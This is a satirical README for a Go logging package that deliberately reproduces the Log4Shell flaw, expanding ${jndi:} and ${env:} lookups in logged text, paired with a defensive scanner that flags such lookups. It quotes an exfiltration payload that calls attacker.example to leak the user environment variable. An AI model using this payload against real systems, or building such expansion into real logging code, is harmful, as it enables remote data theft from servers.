Jndi: An irresponsibly frightening logging library


Is CVE-2021-44228 making you feel left out as a Go programmer?

Worry no more. We can fix that.

I wouldn’t use this package, but if you want to…

package main

import (
	"net/http"

	"github.com/bradfitz/jndi"
)

var logger = jndi.NewLogger()

func main() {
	//...
}

// The request path is attacker-controlled and ends up in the formatted message.
func handleSomeTraffic(r *http.Request) {
	logger.Printf("got request from %s", r.URL.Path)
}

Congrats, the user actually wrote ${jndi:ldap://attacker.example/${env:${lower:u}ser}} and
the logger expanded your environment variable and sent it over the network
as a side effect of logging.
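A defender-side view of the string above, as an added example that is not part of the jndi package: a Go scanner that resolves only the case-folding lookups, so nested obfuscation such as `${lower:u}` is flattened, and reports every other lookup kind without evaluating it. `Scan` and `resolve` are hypothetical names chosen for this sketch.

```go
package main

import (
	"fmt"
	"strings"
)

// resolve folds case for ${lower:x} / ${upper:x} only. Every other lookup kind
// is recorded and put back as literal text; nothing is fetched or read.
func resolve(body string, kinds *[]string) string {
	kind, arg, _ := strings.Cut(body, ":")
	switch kind = strings.ToLower(kind); kind {
	case "lower":
		return strings.ToLower(arg)
	case "upper":
		return strings.ToUpper(arg)
	}
	*kinds = append(*kinds, kind)
	return "${" + body + "}"
}

// Scan normalizes nested lookups innermost-first and returns the de-obfuscated
// text plus the kinds of lookup it saw (hypothetical helper, not part of jndi).
func Scan(s string) (string, []string) {
	var kinds []string
	stack := []string{""} // stack[0] is plain text; deeper entries are open ${...}
	for i := 0; i < len(s); i++ {
		top := len(stack) - 1
		switch {
		case strings.HasPrefix(s[i:], "${"):
			stack = append(stack, "")
			i++ // skip the '{'
		case s[i] == '}' && top > 0:
			stack[top-1] += resolve(stack[top], &kinds)
			stack = stack[:top]
		default:
			stack[top] += s[i : i+1]
		}
	}
	for top := len(stack) - 1; top > 0; top-- { // unterminated "${" stays literal
		stack[top-1] += "${" + stack[top]
	}
	return stack[0], kinds
}

func main() {
	// Constructed sample: a request path carrying the string quoted in this README.
	out, kinds := Scan("/${jndi:ldap://attacker.example/${env:${lower:u}ser}}")
	fmt.Println(out, kinds)
}
```

Any non-empty list of kinds on a request path is worth alerting on, and the normalized text is what a signature for `${jndi:` or `${env:` should be matched against.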

Inspiration

I saw https://twitter.com/_StaticFlow_/status/1469358229767475205 and thought it might
be fun to write an expander while I was bored, stuck in transit.

Bugs

This package is incomplete. log4j actually does a bunch more:

Patches welcome to help flesh this package out. We have some
catching up to do.

Apologies

If you’re seeing this on GitHub and not via Twitter, I acknowledged
that this is questionable taste: https://twitter.com/bradfitz/status/1469523985998118925

In general I believe in the whole #hugops thing. I had a CVE filed against
my own code just the day before: https://twitter.com/bradfitz/status/1469015417679081472

It happens. I joke to cope.
